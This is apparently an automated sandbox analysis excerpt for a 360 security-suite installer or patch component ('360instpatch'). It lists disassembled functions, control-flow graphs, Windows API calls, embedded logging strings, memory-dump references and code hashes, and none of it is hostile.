                                                                                                                                                                                                              control_flow_graph 671 6bf0c7d8-6bf0c9d6 call 6bf38e24 GetTickCount call 6bf38390 call 6bf240cf call 6bee9134 * 2 call 6beed55b call 6befd06f 686 6bf0ca18-6bf0ca4a call 6befc0ec call 6befc0f3 671->686 687 6bf0c9d8-6bf0ca13 call 6bf07821 call 6befa53b call 6bf2405e 671->687 696 6bf0ca60-6bf0ca6c 686->696 697 6bf0ca4c-6bf0ca50 686->697 703 6bf0cf5f-6bf0cf6c call 6bf0c754 687->703 701 6bf0ca92-6bf0ca94 696->701 702 6bf0ca6e-6bf0ca88 call 6bf079aa call 6bf3b3c5 696->702 697->696 700 6bf0ca52-6bf0ca54 697->700 700->696 706 6bf0ca56-6bf0ca5b call 6bf35fbf 700->706 704 6bf0ca96 701->704 705 6bf0ca9c-6bf0caa1 701->705 710 6bf0caa9-6bf0cb16 call 6bf23f7c * 2 call 6bf079aa call 6bf23f7c call 6bf079aa call 6bf3b3c5 702->710 719 6bf0ca8a-6bf0ca90 702->719 716 6bf0d092-6bf0d097 call 6bf38efc 703->716 704->705 709 6bf0caa3 705->709 705->710 706->696 709->710 732 6bf0cb22-6bf0cb3c call 6bf079aa call 6bf3b3c5 710->732 733 6bf0cb18 710->733 719->710 738 6bf0cb63-6bf0cb76 call 6bf38425 732->738 739 6bf0cb3e-6bf0cb42 732->739 733->732 745 6bf0cb81 738->745 746 6bf0cb78-6bf0cb7f call 6bef70ce 738->746 739->738 740 6bf0cb44-6bf0cb4a 739->740 740->738 742 6bf0cb4c-6bf0cb5b 740->742 742->738 744 6bf0cb5d 742->744 744->738 748 6bf0cb83-6bf0cba1 call 6bf38425 745->748 746->748 752 6bf0cba3-6bf0cbaa call 6bf0b780 748->752 753 6bf0cbac 748->753 755 6bf0cbae-6bf0cbcb 752->755 753->755 757 6bf0cbf8-6bf0cbfc 755->757 758 6bf0cbcd-6bf0cbf3 call 6bf079aa call 6bef2b99 call 6bef0ed7 755->758 759 6bf0cc6a-6bf0cc81 call 6bf38425 757->759 760 6bf0cbfe-6bf0cc0e 757->760 758->757 770 6bf0cc83-6bf0cc8d call 6bf0b65d 759->770 771 6bf0cc8f 759->771 762 6bf0cc10-6bf0cc13 760->762 763 6bf0cc15 760->763 766 6bf0cc18-6bf0cc45 call 6bef809d 762->766 763->766 779 6bf0cc47 766->779 780 6bf0cc4d-6bf0cc67 call 6bf23f0c 766->780 775 6bf0cc91-6bf0ccb0 call 6bf06f1e 770->775 771->775 783 6bf0ccb2-6bf0ccb4 775->783 784 6bf0ccb5-6bf0ccca call 6beec462 775->784 779->780 780->759 783->784 788 6bf0cd17-6bf0cd1a 784->788 789 6bf0cccc-6bf0ccd2 784->789 790 6bf0cd21-6bf0cd2f call 6bf06edf 788->790 791 6bf0cd1c-6bf0cd1f 788->791 792 6bf0cd00-6bf0cd06 789->792 793 6bf0ccd4-6bf0ccdf DeleteFileW 789->793 804 6bf0cd3c-6bf0cd3e 790->804 791->790 795 6bf0cd31-6bf0cd3b call 6befd64f 791->795 792->788 794 6bf0cd08-6bf0cd14 call 6beec4ea 792->794 797 6bf0cce1-6bf0cced call 6beec462 793->797 798 6bf0ccfb-6bf0ccfe 793->798 794->788 795->804 797->798 807 6bf0ccef-6bf0ccf6 797->807 798->788 808 6bf0cd40-6bf0cd62 call 6bf07821 call 6befa53b 804->808 809 6bf0cd6c-6bf0cd89 call 6bf3ab44 804->809 810 6bf0cf29-6bf0cf5c call 6bf07821 call 6befa53b call 6bf2405e 807->810 808->809 817 6bf0cd9a 809->817 818 6bf0cd8b-6bf0cd93 call 6beed5cb 809->818 810->703 823 6bf0cd9c-6bf0cda5 817->823 825 6bf0cd98 818->825 826 6bf0cdd3-6bf0cdd7 823->826 827 6bf0cda7-6bf0cdc9 call 6bf07821 call 6befa53b 823->827 825->823 828 6bf0cf71-6bf0cf7b 826->828 829 6bf0cddd-6bf0cde1 826->829 827->826 835 6bf0cf82 828->835 836 6bf0cf7d-6bf0cf80 828->836 833 6bf0cf07-6bf0cf12 DeleteFileW 829->833 834 6bf0cde7-6bf0cdf4 call 6bf087c8 829->834 833->828 839 6bf0cf14-6bf0cf20 call 6beec462 833->839 846 6bf0ce81-6bf0ce84 834->846 847 6bf0cdfa-6bf0ce00 834->847 840 6bf0cf85-6bf0cf8e call 6beec462 835->840 836->840 839->828 855 6bf0cf22-6bf0cf24 839->855 853 6bf0cfb0-6bf0cfbd call 6bf087c8 840->853 854 6bf0cf90-6bf0cf93 call 6beed392 840->854 850 6bf0ceb3-6bf0ceba 846->850 851 6bf0ce86-6bf0ce90 call 6bf084ee 846->851 847->846 852 6bf0ce02-6bf0ce08 847->852 850->833 859 6bf0cebc-6bf0cf02 call 6bf070a8 call 6bf07821 call 6befa53b call 6bf2405e 850->859 851->850 871 6bf0ce92-6bf0ceae call 6beecefd call 6bf07821 851->871 852->846 858 6bf0ce0a-6bf0ce18 852->858 869 6bf0cfca-6bf0cfcc 853->869 870 6bf0cfbf-6bf0cfc5 853->870 866 6bf0cf98-6bf0cfae call 6beecefd call 6bf23f0c 854->866 855->810 864 6bf0ce1a-6bf0ce2b call 6bf06f33 858->864 865 6bf0ce2d-6bf0ce53 call 6bf0757f 858->865 859->716 864->865 882 6bf0ce73-6bf0ce7c 865->882 883 6bf0ce55-6bf0ce57 865->883 899 6bf0cfe2-6bf0cfe5 866->899 877 6bf0cfe7-6bf0cfe9 call 6bf084ee 869->877 878 6bf0cfce-6bf0cfd2 869->878 870->869 876 6bf0cfc7-6bf0cfc9 870->876 905 6bf0d090 871->905 876->869 890 6bf0cfee-6bf0cff4 877->890 878->877 886 6bf0cfd4-6bf0cfdd call 6bf2405e 878->886 882->846 883->882 889 6bf0ce59-6bf0ce5e 883->889 886->899 889->882 897 6bf0ce60-6bf0ce6e call 6beec988 889->897 895 6bf0cff6-6bf0cffc 890->895 896 6bf0cffe-6bf0d013 890->896 895->896 901 6bf0d022-6bf0d034 895->901 896->901 902 6bf0d015 896->902 897->882 899->890 909 6bf0d065-6bf0d089 901->909 910 6bf0d036-6bf0d060 call 6bf079aa call 6bf0ab8f 901->910 906 6bf0d017-6bf0d019 902->906 907 6bf0d01b-6bf0d01d call 6bf09989 902->907 905->716 906->901 906->907 907->901 909->905 910->909
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF0C7DF
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0C85B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0C964
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: _memset.LIBCMT ref: 6BF24102
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF2411D
                                                                                                                                                                                                                • Part of subcall function 6BEE9134: _wcslen.LIBCMT ref: 6BEE913B
                                                                                                                                                                                                                • Part of subcall function 6BEED55B: _wcslen.LIBCMT ref: 6BEED562
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • .P2P, xrefs: 6BF0C9B6
                                                                                                                                                                                                              • [%d.] AppName=%s IsSkipEnt:%d, xrefs: 6BF0CAEE
                                                                                                                                                                                                              • [%d.] EntModuleList=%s, xrefs: 6BF0CACB
                                                                                                                                                                                                              • ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,, xrefs: 6BF0CA7A, 6BF0CAC3
                                                                                                                                                                                                              • 360tray, xrefs: 6BF0CB2E
                                                                                                                                                                                                              • [%d.] Delete mem File, xrefs: 6BF0CFA3
                                                                                                                                                                                                              • [%d.] discard resume mem, xrefs: 6BF0CFD7
                                                                                                                                                                                                              • [%d.] URL = %s File=%s, xrefs: 6BF0C97D
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s) PDownURL = %s, xrefs: 6BF0CA05
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s), xrefs: 6BF0CDC9
                                                                                                                                                                                                              • [%d.] DUQuota = %d Liveupdate360:%d, xrefs: 6BF0CC5C
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s), xrefs: 6BF0CD62
                                                                                                                                                                                                              • [%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d, xrefs: 6BF0CAB8
                                                                                                                                                                                                              • [%d.] ErrorCode = %d(%s), , xrefs: 6BF0CEF2
                                                                                                                                                                                                              • [%d.] FileName=%s ErrorCode= %d(%s), xrefs: 6BF0CF51
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_wcslenwvnsprintf$CountH_prolog3Tick
                                                                                                                                                                                                              • String ID: ,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$.P2P$360tray$[%d.] AppName=%s IsSkipEnt:%d$[%d.] DUQuota = %d Liveupdate360:%d$[%d.] Delete mem File$[%d.] EntModuleList=%s$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s)$[%d.] ErrorCode = %d(%s) PDownURL = %s$[%d.] ErrorCode = %d(%s), $[%d.] FileName=%s ErrorCode= %d(%s)$[%d.] URL = %s File=%s$[%d.] discard resume mem$[%d.]dl DownType:%d P2pDelay:%d.SkipEnt:%d
                                                                                                                                                                                                              • API String ID: 4223458422-4225084922
                                                                                                                                                                                                              • Opcode ID: 02431b624e64b6283d9860f4c7df0bff481641de8433cbceeb7517a88e8992e7
                                                                                                                                                                                                              • Instruction ID: 70d059cf95265ba2e2bc2ac241960d41f44913014c05dbb411a3c24c9d4e2f41
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02431b624e64b6283d9860f4c7df0bff481641de8433cbceeb7517a88e8992e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F426B72900B01DFCB21CF79C851A9AFBF5FF94304F10891EE4AA86270DB79A541EB61
                                                                                                                                                                                                              Function 00B7E0D8 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 191libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 989 b7e0d8-b7e145 call b95421 call b94550 SHGetValueW 994 b7e30f 989->994 995 b7e14b-b7e152 989->995 997 b7e311-b7e333 call b94647 994->997 995->994 996 b7e158-b7e15b 995->996 996->994 998 b7e161-b7e197 call b1b680 PathCombineW PathFileExistsW 996->998 1003 b7e1ad-b7e22c call b2cb91 * 2 call b94550 PathCombineW * 3 call b1e370 998->1003 1004 b7e199-b7e1a8 call b1dd20 998->1004 1015 b7e2b4-b7e2d8 call b94550 call b1e370 1003->1015 1016 b7e232-b7e240 call b1e370 1003->1016 1004->997 1025 b7e2ec-b7e301 call b7d748 1015->1025 1026 b7e2da 1015->1026 1016->1015 1022 b7e242-b7e253 call b1e370 1016->1022 1022->1015 1028 b7e255-b7e25c call b1e7d0 1022->1028 1033 b7e306-b7e30d 1025->1033 1029 b7e2df-b7e2e7 call b1c8e0 1026->1029 1034 b7e261-b7e266 1028->1034 1029->1025 1033->1029 1034->1015 1036 b7e268-b7e289 GetProcAddress * 2 1034->1036 1037 b7e2a3-b7e2a5 1036->1037 1038 b7e28b-b7e29e 1036->1038 1039 b7e2a7-b7e2a9 1037->1039 1040 b7e2ac-b7e2b0 1037->1040 1038->1037 1043 b7e2a0 1038->1043 1039->1040 1040->1033 1042 b7e2b2 1040->1042 1042->1015 1043->1037
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7E0F7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E11A
                                                                                                                                                                                                              • SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 00B7E13C
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 00B7E186
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 00B7E18F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E1DE
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 00B7E1F5
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 00B7E203
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 00B7E214
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 00B7E274
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 00B7E281
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E2C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Combine$_memset$AddressProc$ExistsFileH_prolog3Value
                                                                                                                                                                                                              • String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
                                                                                                                                                                                                              • API String ID: 2656314946-96710800
                                                                                                                                                                                                              • Opcode ID: 969e44c32ccbdca17e811fd06abbb24dedcd7c3e59eb7718e7e4669a5264172c
                                                                                                                                                                                                              • Instruction ID: 61c482d6ae88a10569e53c5cb4c58600e819d81885b7a5eb1a6bb2e43f08f6eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 969e44c32ccbdca17e811fd06abbb24dedcd7c3e59eb7718e7e4669a5264172c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D6129759002499BDB21EFA4DC85EEF77FDEF48700F0044AAE96997181EB70E644CB50
                                                                                                                                                                                                              Function 6BEE6E40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 157synchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(AA5945B3,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6E84
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 6BEE6E9B
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6EB5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6EC8
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6ED8
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEE6EF4
                                                                                                                                                                                                              • _swscanf.LIBCMT ref: 6BEE6F2B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BF5E70B,000000FF), ref: 6BEE6F45
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,?,?,?,?,6BF5E70B), ref: 6BEE6F57
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE6F92
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 6BEE6FA9
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE6FD0
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,6BF7CAE8), ref: 6BEE6FDE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7000
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 6BEE7023
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BEE702E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$CloseException@8HandleHeapProcessReleaseThrow$AllocCreateCurrentErrorLastObjectSingleWait__snwprintf__swprintf_memset_swscanf
                                                                                                                                                                                                              • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                                              • API String ID: 2967953817-332789905
                                                                                                                                                                                                              • Opcode ID: b28ae3e1f820c4bc60c286c63ed6298eeb20c6970046109500a207bac171fe64
                                                                                                                                                                                                              • Instruction ID: 47e4fd53f6c29f7560b8ecb166689e46e0b5157fbb5250fca621be9711019b4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b28ae3e1f820c4bc60c286c63ed6298eeb20c6970046109500a207bac171fe64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E85103B2840215AFDB10DFB4CC45BAF77B8EF05704F204199EA15EB250EB3896498BB1
                                                                                                                                                                                                              Function 00B665A6 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 336windowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B665AD
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00B665D5
                                                                                                                                                                                                                • Part of subcall function 00B63197: InvalidateRect.USER32(?,00000000,00000000,?,?,00B60207,?), ref: 00B631AD
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EF), ref: 00B6665A
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F1), ref: 00B666B4
                                                                                                                                                                                                                • Part of subcall function 00B5F7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 00B5F7F6
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000411), ref: 00B666E7
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,000003F6), ref: 00B66774
                                                                                                                                                                                                                • Part of subcall function 00B46C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00B46CBC
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,000003EA), ref: 00B667C4
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,000000E5,PNG,00000004,?), ref: 00B6680B
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,0000040F), ref: 00B6686E
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B668A2
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00B668B0
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,00000410), ref: 00B668DC
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00B66903
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,00000409), ref: 00B66932
                                                                                                                                                                                                                • Part of subcall function 00B6134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,00B477F9,0000013F,PNG), ref: 00B613A1
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,000003ED), ref: 00B669D2
                                                                                                                                                                                                                • Part of subcall function 00B662CA: __EH_prolog3.LIBCMT ref: 00B662D1
                                                                                                                                                                                                                • Part of subcall function 00B61610: EnableWindow.USER32(?,?), ref: 00B6161B
                                                                                                                                                                                                                • Part of subcall function 00B61610: InvalidateRect.USER32(?,00000000,00000001,?,?,00B45AF9,?), ref: 00B6162A
                                                                                                                                                                                                                • Part of subcall function 00B61610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00B45AF9,?), ref: 00B6163C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Window$Show$H_prolog3InvalidateLongRect$EnableMessageRedrawSend
                                                                                                                                                                                                              • String ID: PNG
                                                                                                                                                                                                              • API String ID: 1363821098-364855578
                                                                                                                                                                                                              • Opcode ID: 402503dbca1896c736324a5b2a9d2d72e02b307ba7e55aeb13f70880c1d69b8b
                                                                                                                                                                                                              • Instruction ID: 33a4c237f0e70a05ba2adca08f6a14456caca3b6aee14d3d901a409efdc347c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 402503dbca1896c736324a5b2a9d2d72e02b307ba7e55aeb13f70880c1d69b8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDD17B30540B09ABDB24EB70CC96FEAB7E4AF14711F404998B16B671E2EF706A48CB15
                                                                                                                                                                                                              Function 6BF05625 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1362 6bf05625-6bf05664 call 6bf38e24 call 6bf02f35 call 6bf01914 1368 6bf05669-6bf05674 1362->1368 1369 6bf05676 1368->1369 1370 6bf05679-6bf05680 1368->1370 1369->1370 1371 6bf05682 1370->1371 1372 6bf05685-6bf056df call 6bf240cf call 6bee8fa1 * 2 1370->1372 1371->1372 1379 6bf056e1-6bf056e4 1372->1379 1380 6bf056e6 1372->1380 1381 6bf056e9-6bf05703 call 6bf3b6b7 1379->1381 1380->1381 1384 6bf05705-6bf05708 1381->1384 1385 6bf0570a 1381->1385 1386 6bf0570d-6bf05723 call 6bf3b6b7 1384->1386 1385->1386 1389 6bf05762-6bf0576a 1386->1389 1390 6bf05725-6bf0575f call 6bf032b2 call 6bf384d6 1386->1390 1391 6bf05774-6bf0577d call 6bf38001 1389->1391 1392 6bf0576c-6bf0576f 1389->1392 1400 6bf05796-6bf0579f call 6bf38001 1391->1400 1401 6bf0577f-6bf0578e call 6bf38001 1391->1401 1392->1391 1396 6bf05771 1392->1396 1396->1391 1406 6bf05940-6bf05951 call 6bf38001 1400->1406 1407 6bf057a5-6bf057c2 call 6bf3b3c5 * 2 1400->1407 1401->1400 1408 6bf05790 1401->1408 1414 6bf05953-6bf05963 StrStrIW 1406->1414 1415 6bf05986-6bf0598e 1406->1415 1423 6bf057c4-6bf057ca 1407->1423 1424 6bf057cc-6bf057ce 1407->1424 1408->1400 1416 6bf05974-6bf0597d call 6bf0429a 1414->1416 1417 6bf05965-6bf05972 call 6bf05137 1414->1417 1419 6bf05990-6bf05992 1415->1419 1420 6bf0599d 1415->1420 1416->1415 1432 6bf0597f 1416->1432 1417->1415 1419->1420 1425 6bf05994-6bf05998 call 6bf05137 1419->1425 1427 6bf057e2 1423->1427 1428 6bf057d0-6bf057dd 1424->1428 1429 6bf057df 1424->1429 1425->1420 1433 6bf057e9-6bf057fc call 6bf3b3c5 1427->1433 1428->1433 1429->1427 1432->1415 1433->1406 1436 6bf05802-6bf058ab call 6bee9134 call 6bf3b717 call 6bf38390 * 3 call 6bf03f1c 1433->1436 1436->1406 1449 6bf058b1-6bf058b5 1436->1449 1450 6bf058b7-6bf058ba 1449->1450 1451 6bf058bc 1449->1451 1452 6bf058bf-6bf058d0 call 6bf3b738 1450->1452 1451->1452 1452->1406 1455 6bf058d2-6bf058d9 1452->1455 1455->1406 1456 6bf058db-6bf058e3 1455->1456 1457 6bf058f4-6bf0592b call 6bf38390 call 6bf02279 1456->1457 1458 6bf058e5-6bf058ef call 6bee9134 1456->1458 1457->1406 1464 6bf0592d-6bf05932 1457->1464 1458->1457 1464->1406 1465 6bf05934-6bf0593b call 6bee9134 1464->1465 1465->1406
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF05644
                                                                                                                                                                                                                • Part of subcall function 6BF01914: __EH_prolog3.LIBCMT ref: 6BF0191B
                                                                                                                                                                                                                • Part of subcall function 6BF01914: GetTickCount.KERNEL32 ref: 6BF01926
                                                                                                                                                                                                                • Part of subcall function 6BF01914: GetTickCount.KERNEL32 ref: 6BF01930
                                                                                                                                                                                                                • Part of subcall function 6BF01914: GetTickCount.KERNEL32 ref: 6BF01940
                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 6BF056F7
                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 6BF05716
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05775
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05786
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05797
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0583E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF05855
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0586C
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0590A
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05949
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,http://,?,?,?,00000000,00000000,000000FF,?,?,?,?,?,0000000C), ref: 6BF05959
